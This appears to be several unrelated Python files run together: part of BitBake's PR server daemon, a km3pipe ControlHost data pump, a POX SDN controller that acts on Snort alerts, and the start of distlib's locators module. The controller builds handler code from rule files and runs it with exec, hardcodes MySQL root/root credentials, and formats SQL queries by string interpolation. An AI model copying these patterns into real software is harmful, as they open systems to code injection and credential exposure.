except ImportError:
from pysqlite2 import dbapi2 as sqlite3
import bb.server.xmlrpc
import prserv
import prserv.db
import errno
logger = logging.getLogger("BitBake.PRserv")
if sys.hexversion < 0x020600F0:
print("Sorry, python 2.6 or later is required.")
sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
def _dispatch(self,method,params):
try:
value=self.server.funcs[method](*params)
except:
import traceback
traceback.print_exc()
raise
return value
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
''' constructor '''
SimpleXMLRPCServer.__init__(self, interface,
logRequests=False, allow_none=True)
self.dbfile=dbfile
self.daemon=daemon
self.logfile=logfile
self.working_thread=None
self.host, self.port = self.socket.getsockname()
self.pidfile=PIDPREFIX % (self.host, self.port)
self.register_function(self.getPR, "getPR")
self.register_function(self.quit, "quit")
self.register_function(self.ping, "ping")
self.register_function(self.export, "export")
self.register_function(self.importone, "importone")
self.register_introspection_functions()
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
self.requestqueue = Queue.Queue()
self.handlerthread = threading.Thread(target = self.process_request_thread)
self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
while True:
(request, client_address) = self.requestqueue.get()
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quit
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quit=True
return
def work_forever(self,):
self.quit = False
self.timeout = 0.5
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quit:
self.handle_request()
self.table.sync()
logger.info("PRServer: stopping...")
self.server_close()
return
def start(self):
pid = self.daemonize()
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
See Advanced Programming in the UNIX, Sec 13.3
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.umask(0)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
si = file('/dev/null', 'r')
so = file(self.logfile, 'a+')
se = so
os.dup2(si.fileno(),sys.stdin.fileno())
os.dup2(so.fileno(),sys.stdout.fileno())
os.dup2(se.fileno(),sys.stderr.fileno())
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = file(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
os._exit(0)
class PRServSingleton(object):
def __init__(self, dbfile, logfile, interface):
self.dbfile = dbfile
self.logfile = logfile
self.interface = interface
self.host = None
self.port = None
def start(self):
self.prserv = PRServer(self.dbfile, self.logfile, self.interface)
self.prserv.start()
self.host, self.port = self.prserv.getinfo()
def getinfo(self):
return (self.host, self.port)
class PRServerConnection(object):
def __init__(self, host, port):
if is_local_special(host, port):
host, port = singleton.getinfo()
self.host = host
self.port = port
self.connection, self.transport = bb.server.xmlrpc._create_server(self.host, self.port)
def terminate(self):
try:
logger.info("Terminating PRServer...")
self.connection.quit()
except Exception as exc:
sys.stderr.write("%s\n" % str(exc))
def getPR(self, version, pkgarch, checksum):
return self.connection.getPR(version, pkgarch, checksum)
def ping(self):
return self.connection.ping()
def export(self,version=None, pkgarch=None, checksum=None, colinfo=True):
return self.connection.export(version, pkgarch, checksum, colinfo)
def importone(self, version, pkgarch, checksum, value):
return self.connection.importone(version, pkgarch, checksum, value)
def getinfo(self):
return self.host, self.port
def start_daemon(dbfile, host, port, logfile):
pidfile = PIDPREFIX % (host, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if pid:
sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
% pidfile)
return 1
server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (host,port))
server.start()
return 0
def stop_daemon(host, port):
pidfile = PIDPREFIX % (host, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if not pid:
sys.stderr.write("pidfile %s does not exist. Daemon not running?\n"
% pidfile)
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
if pid:
wait_timeout = 0
print("Waiting for pr-server to exit.")
while is_running(pid) and wait_timeout < 50:
time.sleep(0.1)
wait_timeout += 1
if is_running(pid):
print("Sending SIGTERM to pr-server.")
os.kill(pid,signal.SIGTERM)
time.sleep(0.1)
if os.path.exists(pidfile):
os.remove(pidfile)
except OSError as e:
err = str(e)
if err.find("No such process") <= 0:
raise e
return 0
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
def is_local_special(host, port):
if host.strip().upper() == 'localhost'.upper() and (not port):
return True
else:
return False
class PRServiceConfigError(Exception):
pass
def auto_start(d):
global singleton
host_params = filter(None, (d.getVar('PRSERV_HOST', True) or '').split(':'))
if not host_params:
return None
if len(host_params) != 2:
logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
'Usage: PRSERV_HOST = "<hostname>:<port>"']))
raise PRServiceConfigError
if is_local_special(host_params[0], int(host_params[1])) and not singleton:
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR", True) or d.getVar("CACHE", True))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
raise PRServiceConfigError
bb.utils.mkdirhier(cachedir)
dbfile = os.path.join(cachedir, "prserv.sqlite3")
logfile = os.path.join(cachedir, "prserv.log")
singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
singleton.start()
if singleton:
host, port = singleton.getinfo()
else:
host = host_params[0]
port = int(host_params[1])
try:
connection = PRServerConnection(host,port)
connection.ping()
realhost, realport = connection.getinfo()
return str(realhost) + ":" + str(realport)
except Exception:
logger.critical("PRservice %s:%d not available" % (host, port))
raise PRServiceConfigError
def auto_shutdown(d=None):
global singleton
if singleton:
host, port = singleton.getinfo()
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
singleton = None
def ping(host, port):
conn=PRServerConnection(host, port)
return conn.ping()
|
ch.py
|
#!/usr/bin/env python
# Filename: jpp.py
# pylint: disable=
"""
Pump for the jpp file read through aanet interface.
"""
from thepipe import Module, Blob
from km3pipe.controlhost import Client
from km3pipe.time import Cuckoo
from km3pipe.logger import get_logger
import threading
import socket
import time
import numpy as np
from collections import deque
from queue import Queue, Empty
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2016, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
log = get_logger(__name__) # pylint: disable=C0103
class CHPump(Module):
"""A pump for ControlHost data."""
def configure(self):
self.host = self.get("host") or "127.0.0.1"
self.port = self.get("port") or 5553
self.tags = self.get("tags") or "MSG"
self.timeout = self.get("timeout") or 60 * 60 * 24
self.max_queue = self.get("max_queue") or 50
self.key_for_data = self.get("key_for_data") or "CHData"
self.key_for_prefix = self.get("key_for_prefix") or "CHPrefix"
self.subscription_mode = self.get("subscription_mode", default="any")
self.show_statistics = self.get("show_statistics", default=False)
self.statistics_interval = self.get("statistics_interval", default=30)
self.cuckoo_warn = Cuckoo(60 * 5, log.warning)
self.performance_warn = Cuckoo(
self.statistics_interval, self.show_performance_statistics
)
self.idle_dt = deque(maxlen=1000)
self.idle_timer = time.time()
self.message_count = 0
self.loop_cycle = 0
self.queue = Queue()
self.client = None
self.thread = None
if self.subscription_mode == "all":
self.log.warning(
"You subscribed to the ligier in 'all'-mode! "
"If you are too slow with data processing, "
"you will block other clients. "
"If you don't understand this message "
"and are running this code on a DAQ machine, "
"consult a DAQ expert now and stop this script."
)
print(
"Connecting to {0} on port {1}\n"
"Subscribed tags: {2}\n"
"Connection timeout: {3}s\n"
"Maximum queue size for incoming data: {4}".format(
self.host, self.port, self.tags, self.timeout, self.max_queue
)
)
self._init_controlhost()
self._start_thread()
def _start_thread(self):
log.debug("Starting and demonising thread.")
self.thread = threading.Thread(target=self._run, args=())
self.thread.daemon = True
self.thread.start()
def _init_controlhost(self):
"""Set up the controlhost connection"""
log.debug("Connecting to JLigier")
self.client = Client(self.host, self.port)
self.client._connect()
log.debug("Subscribing to tags: %s", self.tags)
for tag in self.tags.split(","):
self.client.subscribe(tag.strip(), mode=self.subscription_mode)
log.debug("Controlhost initialisation done.")
def _run(self):
log.debug("Entering the main loop.")
while True:
current_qsize = self.queue.qsize()
self.loop_cycle += 1
self._set_idle_timer()
try:
prefix, data = self.client.get_message()
except EOFError:
log.warning("EOF from Ligier, trying again in 30 seconds...")
time.sleep(30)
continue
except BufferError:
log.error("Buffer error in Ligier stream, aborting...")
break
else:
self._add_idle_dt()
self.message_count += 1
self.performance_warn()
# log.debug("%d bytes received from network.", len(data))
if not data:
log.critical(
"No data received, connection died.\n"
+ "Trying to reconnect in 30 seconds."
)
time.sleep(30)
try:
log.debug("Reinitialising new CH connection.")
self._init_controlhost()
except socket.error:
log.error("Failed to connect to host.")
continue
if current_qsize > self.max_queue:
self.cuckoo_warn(
"Maximum queue size ({0}) reached, "
"dropping data.".format(self.max_queue)
)
else:
self.queue.put((prefix, data))
log.debug("Quitting the main loop.")
def process(self, blob):
"""Wait for the next packet and put it in the blob"""
try:
log.debug("Waiting for queue items.")
prefix, data = self.queue.get(timeout=self.timeout)
log.debug("Got %d bytes from queue.", len(data))
except Empty:
log.warning("ControlHost timeout (%d s) reached", self.timeout)
raise StopIteration("ControlHost timeout reached.")
blob[self.key_for_prefix] = prefix
blob[self.key_for_data] = data
return blob
def show_performance_statistics(self):
if not self.show_statistics:
return
dt = np.median(self.idle_dt)
current_qsize = self.queue.qsize()
log_func = self.cprint
if dt < 0 or current_qsize > 0:
log_func = self.log.warning
log_func(
"Message rate: {0:.1f} Hz, median idle time per message: "
"{1:.3f} us (current queue size: {2})".format(
self.message_count / self.statistics_interval, dt * 1e6, current_qsize
)
)
self.message_count = 0
def _set_idle_timer(self):
self.idle_timer = time.time()
def _add_idle_dt(self):
now = time.time()
self.idle_dt.append(now - self.idle_timer)
def finish(self):
"""Clean up the JLigier controlhost connection"""
log.debug("Disconnecting from JLigier.")
self.client.socket.shutdown(socket.SHUT_RDWR)
self.client._disconnect()
def __iter__(self):
return self
def __next__(self):
return self.process(Blob())
def next(self):
return self.__next__()
def CHTagger(blob):
tag = str(blob["CHPrefix"].tag)
blob[tag] = True
return blob
|
securecore.py
|
from pox.core import core
from pox.lib.revent import revent
import pox.openflow.libopenflow_01 as of
import pox.openflow.nicira as nx
from pox.openflow.discovery import Discovery
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
from pox.lib.addresses import IPAddr
from pox.lib.addresses import EthAddr
import pox.lib.packet as pkt
import pox.openflow.spanning_tree
import asyncore
import mysql.connector
import struct
import asynchat
import socket
import thread
import os
import RouteApp
import threading
import time
import pyinotify
import random
log = core.getLogger()
SNORT_ADDR = "10.0.1.2"
ip2serv_name = {"10.0.0.252" : "http", "10.0.0.1" : "http"}
serv_name2ip = {"http" : ["10.0.0.252", "10.0.0.1"]}
gateway_mac=EthAddr("08:00:27:47:7b:44")
MAXCMD = 100
HIGH = 4
MID = 3
LOWMID = 2
LOW = 1
def start_server(socket_map):
asyncore.loop(map = socket_map)
def start_watch(wm, eh):
notifier = pyinotify.Notifier(wm, eh)
notifier.loop()
class MyEventHandler(pyinotify.ProcessEvent):
log.info("Starting monitor...")
def gen_cmd(self, pathname):
try:
fd = open(pathname, 'r')
commands = fd.readlines(MAXCMD)
fd.close()
return commands
except IOError as e:
log.error("I/O error ({0}): {1}".format(e.errno, e.strerror))
return -1
def func_gen(self, event):
commands = self.gen_cmd(event.pathname)
if not commands == -1:
core.secure.func_gen(event.name, commands)
func_name = event.name
value = func_name.split('_')
if not core.secure.func_table.has_key(value[0]):
core.secure.func_table[value[0]]={}
if not core.secure.func_table[value[0]].has_key(value[1]):
core.secure.func_table[value[0]][value[1]] = {}
if (len(value) == 4):
core.secure.func_table[value[0]][value[1]][(value[2],value[3])] = func_name
else:
core.secure.func_table[value[0]][value[1]]["any"] = func_name
def func_del(self, event):
func_name = "func_" + event.name
try:
funcname = func_name.replace(" ", "_")
core.secure.funclist.remove(func_name)
delattr(core.secure.handlers, funcname)
value = func_name.split('_')
del value[0]
if (len(value) == 4):
del core.secure.func_table[value[0]][value[1]][(value[2],value[3])]
else:
del core.secure.func_table[value[0]][value[1]]["any"]
log.info("handler %s removed, rules updated."%func_name)
except ValueError as e:
log.error('%s is not in the funclist'%func_name)
def process_IN_MOVED_TO(self, event):
log.debug('MOVED_TO event: %s'%event.name)
self.func_gen(event)
def process_IN_MODIFY(self, event):
log.debug('MODIFY event: %s'%event.name)
self.func_del(event)
self.func_gen(event)
def process_IN_DELETE(self, event):
log.debug('DELETE event: %s'%event.name)
self.func_del(event)
def process_IN_MOVED_FROM(self, event):
log.debug('MOVED_FROM event: %s', event.name)
self.func_del(event)
class AlertIn(revent.Event):
def __init__(self, alertmsg):
revent.Event.__init__(self)
self.name = alertmsg[0]
self.priority = alertmsg[1]
self.src = alertmsg[2]
self.dst = alertmsg[3]
self.occation = alertmsg[4]
class Reminder(revent.EventMixin):
_eventMixin_events = set([
AlertIn,
])
def __init__(self):
self.msg = None
def set_msg(self, msg):
self.msg = msg
def alert(self):
self.raiseEvent(AlertIn, self.msg)
class secure_connect(asynchat.async_chat):
def __init__(self, connection, socket_map):
asynchat.async_chat.__init__(self, connection, map = socket_map)
self.buf = []
self.ac_in_buffer_size = 1024
self.set_terminator("@")
def collect_incoming_data(self, data):
self.buf.append(data)
def found_terminator(self):
temp = ("".join(self.buf)).split("\n")
core.Reminder.set_msg(temp)
core.Reminder.alert()
self.buf=[]
self.set_terminator("@")
class secure_server(asyncore.dispatcher):
def __init__(self, socket_map):
self.socket_map = socket_map
asyncore.dispatcher.__init__(self, map = self.socket_map)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(("0.0.0.0",20000))
self.listen(5)
def handle_accept(self):
connection, addr = self.accept()
server_connect = secure_connect(connection, self.socket_map)
class handlers(object):
def __init__(self):
pass
class secure(object):
def start(self):
core.openflow.addListeners(self)
core.openflow_discovery.addListeners(self)
def __init__(self, path):
self.path = path
self.filelist=None
self.counter=0
self.filenum=0
self.cmdlist = ["disconnect", "wait", "reconnect", "pass", "monitor", "reset", "redirect", "unredirect", "passit"]
self.handlers = handlers()
self.funclist = None
self.sig_table= {"BAD-TRAFFIC same SRC/DST":"1",
"ICMP Time-To-Live Exceeded in Transit":"2",
"ICMP Echo Reply":"3",
"ICMP PING BSDtype":"4",
"ICMP PING *NIX":"5",
"ICMP PING":"6",
"SNMP AgentX/tcp request":"7",
"SNMP request tcp":"8"}
self.func_table={}
self.alys_cmd()
self.action_triggered = False
self.name_process()
self.mactable = {}
self.iptable = {}
self.droplist = {}
self.monitorlist = {}
self.redirectlist = {}
self.ignorelist = []
self.socket_map = {}
self.server = secure_server(self.socket_map)
core.Reminder.addListeners(self)
core.addListener(pox.core.GoingUpEvent, self.start_server)
core.call_when_ready(self.start, ["openflow_discovery", "NX"])
core.callDelayed(1, self.start_watch)
def start_server(self, event):
thread.start_new_thread(start_server, (self.socket_map,))
def start_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch(self.path, pyinotify.ALL_EVENTS, rec = True)
eh = MyEventHandler()
thread.start_new_thread(start_watch, (wm, eh))
def func_gen(self, File, cmds):
func_name = "func_" + File
self.funclist.append(func_name)
func_name = func_name.replace(" ", "_")
cmdgenlist = []
for each in cmds:
item = each.split('\n')
action=item[0].split(',')
if action[0]=="time":
action[1]=float(action[1])
func_action = "self."+action[0]+"("+action[1]+")"
elif action[0] in self.cmdlist:
if(len(action) == 1):
func_action = "self." + action[0] + "()"
else:
func_action = "self."+action[0]+"("+action[1]+")"
cmdgenlist.append(func_action)
func_action = ''
function = "def "+func_name+"(self, src, dst):\n"
for command in cmdgenlist:
function = function+" "+command+"\n"
exec function
setattr(self.handlers, func_name, eval(func_name))
log.info("handler %s registered, rules updated."%func_name)
def alys_file(self):
for File in self.filelist:
fd = open(self.path + File,'r')
commands = fd.readlines(MAXCMD)
fd.close()
yield File, commands
def alys_cmd(self):
self.filelist = os.listdir(self.path)
self.funclist = []
self.filenum = len(self.filelist)
filegen = self.alys_file()
while self.counter < self.filenum:
File,commands = filegen.next()
self.func_gen(File, commands)
self.counter += 1
def passit(self):
self.action_triggered = True
def disconnect(self,addr):
self.action_triggered = False
if self.droplist.has_key(addr):
self.droplist[addr] += 1
else:
self.droplist[addr] = 1
if self.droplist[addr] != 1:
return
ipaddr = IPAddr(addr)
msg = of.ofp_flow_mod()
msg.priority = MID
if self.iptable.has_key(ipaddr) and self.iptable[ipaddr] != gateway_mac:
#Forbid inside machine from sending packets
host_mac = self.iptable[ipaddr]
switchid = self.mactable[host_mac][0]
msg.match.dl_type = 0x0800
msg.match.dl_src = host_mac
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
else:
switchid = self.mactable[gateway_mac][0]
msg.match.dl_type = 0x0800
msg.match.nw_src = ipaddr
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
log.info("%s being disconncted"%addr)
def redirect(self,addr):
self.action_triggered = False
ipaddr = IPAddr(addr)
if not ip2serv_name.has_key(addr):
return
if self.redirectlist.has_key(addr):
self.redirectlist[addr] += 1
else:
self.redirectlist[addr] = 1
if self.redirectlist[addr] == 1:
if self.droplist.has_key(addr):
if ip2serv_name.has_key(addr):
serv_name = ip2serv_name[addr]
if serv_name2ip.has_key(serv_name):
Masterip = serv_name2ip[serv_name][0]
Masteraddr = IPAddr(Masterip)
livelist = [ item for item in serv_name2ip[serv_name] if item not in self.droplist ]
if len(livelist) > 0:
new_ip = random.choice(livelist)
log.info("redirectint for %s to %s \nin the service of %s"%(addr, str(new_ip), serv_name))
new_mac = self.iptable[IPAddr(new_ip)]
msg = of.ofp_flow_mod()
msg.match.dl_dst = self.iptable[Masteraddr]
msg.actions.append(of.ofp_action_dl_addr.set_dst(new_mac))
msg.actions.append(of.ofp_action_nw_addr.set_dst(IPAddr(new_ip)))
msg.priority = HIGH
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), self.mactable[gateway_mac][0], self.mactable[new_mac][0])
routelist[-1] = self.mactable[new_mac]
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
msg = of.ofp_flow_mod()
msg.match.dl_src = self.iptable[IPAddr(new_ip)]
msg.match.dl_dst = gateway_mac
msg.priority = HIGH
#msg.match.nw_proto = pkt.ipv4.TCP_PROTOCO
msg.actions.append(of.ofp_action_dl_addr.set_src(self.iptable[ipaddr]))
msg.actions.append(of.ofp_action_nw_addr.set_src(ipaddr))
msg.actions.append(of.ofp_action_output(port = self.mactable[gateway_mac][1]))
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
else:
log.error("no more same service ip to redirect")
else:
log.error("check the service to ip dictionary %s"%serv_name)
else:
log.error("check the ip to service dictionary %s"%addr)
else:
log.error("%s is not in droplist"%addr)
def wait(self,arg):
#if self.action_triggered:
log.info("waiting for %d seconds"%arg)
time.sleep(arg)
def reconnect(self,addr):
self.action_triggered = False
self.droplist[addr] -= 1
if self.droplist[addr] <= 0:
ipaddr = IPAddr(addr)
self.droplist[addr] = 0
log.info("%s being reconnected"%addr)
msg = of.ofp_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.priority = MID
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
if self.iptable.has_key(ipaddr) and self.iptable[ipaddr] != gateway_mac:
host_mac = self.iptable[ipaddr]
switchid = self.mactable[host_mac][0]
msg.match.dl_type = 0x0800
msg.match.dl_src = host_mac
else:
switchid = self.mactable[gateway_mac][0]
msg.match.dl_type = 0x0800
msg.match.nw_src = ipaddr
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def monitor(self, addr):
self.action_triggered = False
ipaddr = IPAddr(addr)
if not self.iptable.has_key(ipaddr):
return
if self.iptable[ipaddr] == gateway_mac:
return
if self.monitorlist.has_key(addr):
self.monitorlist[addr] += 1
else:
self.monitorlist[addr] = 1
if self.monitorlist[addr] == 1:
log.info("packet from/to %s mirrored for monitoring"%addr)
#msg = nx.nx_flow_mod()
#msg.table_id = 1
msg = of.ofp_flow_mod()
msg.priority = LOWMID
#msg.match.eth_src = self.iptable[ipaddr]
msg.match.dl_src = self.iptable[ipaddr]
msg.match.dl_type = 0x0800
msg.actions.append(of.ofp_action_dl_addr.set_dst(gateway_mac))
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), self.mactable[self.iptable[ipaddr]][0], self.mactable[gateway_mac][0])
routelist[-1] = self.mactable[gateway_mac]
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
switchid = self.mactable[self.iptable[ipaddr]][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
#delete all flow entries in flowtable 1
def reset(self, addr):
self.action_triggered = False
self.monitorlist[addr] -= 1
if self.monitorlist[addr] > 0:
return
self.monitorlist[addr] = 0
log.info("resetting %s"%addr)
msg = nx.nx_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.table_id = 1
ipaddr = IPAddr(addr)
host_mac = self.iptable[ipaddr]
msg.match.eth_src = host_mac
switchid = self.mactable[host_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def unredirect(self, addr):
self.action_triggered = False
self.redirectlist[addr] -= 1
if self.redirectlist[addr] > 0:
return
self.redirectlist[addr] = 0
log.info("unredirecting %s"%addr)
msg = nx.nx_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.table_id = 1
serv_name = ip2serv_name[addr]
Masterip = serv_name2ip[serv_name]
Masteraddr = IPAddr(Masterip)
host_mac = self.iptable[Masteraddr]
msg.match.eth_dst = host_mac
msg.match.of_ip_src = Masterip
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def name_process(self):
for func_name in self.funclist:
value = func_name.split('_')
del value[0]
if not self.func_table.has_key(value[0]):
self.func_table[value[0]]={}
if not self.func_table[value[0]].has_key(value[1]):
self.func_table[value[0]][value[1]] = {}
if (len(value) == 4):
self.func_table[value[0]][value[1]][(value[2],value[3])] = func_name
else:
self.func_table[value[0]][value[1]]["any"] = func_name
#{priority:{signatrue:{(interval, times):funcname}}}
def occa_process(self, occation, during):
timeArray = time.strptime(occation, "%Y-%m-%d %H:%M:%S")
timeStamp = time.mktime(timeArray)
timeStamp -= float(during)
timeArray = time.localtime(timeStamp)
before = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
return before
def _handle_AlertIn(self, event):
log.info("Alert In.")
sig = event.name
occation = event.occation
priority = event.priority
sip = event.src
dip = event.dst
if self.monitorlist.has_key(sip) and self.monitorlist[sip] > 0 and not sig in self.ignorelist:
log.info("%s is under attack and may have been captured, so disconncet it."%sip)
self.disconnect(sip)
func_name = "func_"
if self.func_table.has_key(priority):
func_name += priority
if self.func_table[priority].has_key(sig):
func_name += "_" + sig
if (len(self.func_table[priority][sig]) == 1) and (self.func_table[priority][sig].keys()[0] == "any"):
func_name += "_any"
else:
timelist = [item for item in self.func_table[priority][sig].keys()]
flag = False
for time in timelist:
before = self.occa_process(occation, time[0])
times = self.sql(before, occation, sip, dip)
log.info("this has happened:%d times"%times)
if times >= int(time[1]):
func_name += "_" + time[0] + "_" + time[1]
flag = True
break
if not flag:
if (self.func_table[priority][sig].has_key("any")):
func_name += "_any"
else:
log.error("No Strategy")
return
elif (self.func_table[priority].has_key("any")):
func_name += "_any"
if (len(self.func_table[priority]["any"]) == 1) and (self.func_table[priority][sig][self.func_table[priority]["any"].keys()[0]] == "any"):
func_name += "_any"
else:
timelist = [item for item in self.func_table[priority]["any"].keys()]
flag = False
for time in timelist:
before = self.occa_process(occation, time[0])
times = self.sql(before, occation, sip, dip)
log.info("this has happened:%d times"%times)
if times >= int(time[1]):
func_name += "_" + time[0] + "_" + time[1]
flag = True
break
if not flag:
if (self.func_table[priority]["any"].has_key("any")):
func_name += "_any"
else:
log.error("No Strategy")
return
else:
log.error("No Strategy for signatrue %s"%sig)
return
else:
log.error("No Strategy for priority %s"%priority)
return
func_name = func_name.replace(" ", "_")
new_th = threading.Thread(target = getattr(self.handlers, func_name), args=(self, sip, dip))
new_th.start()
def sql(self, before, occation, src, dst):
try:
conn = mysql.connector.connect(host=SNORT_ADDR, user='root',passwd='root',db='snort')
except Exception, e:
log.error(e)
sys.exit(-1)
cursor = conn.cursor()
cursor.execute("select count(*) as times from iphdr,event where (event.timestamp between '%s' and '%s') and (iphdr.ip_src=%d and iphdr.ip_dst=%d) and iphdr.cid=event.cid;"%(before, occation, socket.ntohl(struct.unpack("I", socket.inet_aton(src))[0]), socket.ntohl(struct.unpack("I", socket.inet_aton(dst))[0])))
rows = cursor.fetchone()
cursor.close()
conn.close()
return rows[0]
def _handle_ConnectionUp(self, event):
msg = nx.nx_packet_in_format()
event.connection.send(msg)
msg = nx.nx_flow_mod_table_id()
event.connection.send(msg)
msg = nx.nx_flow_mod(command = of.OFPFC_DELETE)
msg.table_id = 1
event.connection.send(msg)
def _handle_PacketIn(self, event):
packet = event.parsed
#the flood method
def flood(switch):
msg = of.ofp_packet_out()
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
msg.data = event.ofp
msg.in_port = event.port
switch.send(msg)
#the drop method
def drop(switch):
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
switch.send(msg)
ip = packet.find("ipv4")
if ip == None:
ip = packet.find("icmp")
if ip:
if not self.iptable.has_key(ip.srcip):
self.iptable[ip.srcip] = packet.src
if not self.mactable.has_key(packet.src):
self.mactable[packet.src] = (event.dpid, event.port)
if packet.type == packet.LLDP_TYPE or packet.dst.isBridgeFiltered():
drop(event.connection)
return
if packet.dst.is_multicast:
flood(event.connection)
else:
if not self.mactable.has_key(packet.dst):
flood(event.connection)
else:
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), event.dpid, self.mactable[packet.dst][0])
routelist[-1] = self.mactable[packet.dst]
msg = of.ofp_packet_out()
msg.data = event.ofp
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
event.connection.send(msg)
for switchid,out_port in routelist:
msg = nx.nx_flow_mod()
msg.table_id = 0
msg.priority = LOW
msg.match.eth_dst = packet.dst
msg.actions.append(of.ofp_action_output(port = out_port))
#msg.actions.append(nx.nx_action_resubmit.resubmit_table(table = 1))
msg.idle_timeout = 10
msg.hard_timeout = 30
switch = core.openflow.getConnection(switchid)
switch.send(msg)
def launch():
path = "./rules/"
core.registerNew(Reminder)
core.registerNew(secure, path)
log.info("Secure module launched.")
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile('^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
